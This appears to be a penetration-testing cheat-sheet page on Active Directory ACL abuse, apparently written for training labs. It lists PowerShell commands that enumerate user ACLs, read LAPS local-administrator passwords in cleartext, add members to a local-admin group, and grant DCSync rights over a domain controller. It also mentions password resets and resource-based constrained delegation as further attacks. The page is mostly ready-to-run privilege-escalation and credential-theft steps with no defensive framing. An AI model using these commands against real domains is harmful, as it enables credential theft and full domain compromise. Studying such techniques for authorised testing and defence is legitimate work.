ACL Abuse

Enumeration

# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1

# Get DistinguishedName
Get-ADUser -Identity USER

# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.

# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 

# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>

# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group 

# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS

# Check
Get-ADGroupMember -Identity "LocalAdmins"

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform Resource Based Constrained Delegation Attack

GenericAll over User Object

Can reset their password without knowing the old one

WriteDACL over DC

Can give DCSync privs to user

Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose

Resources

PreviousEscalationNextKerberoasting

Last updated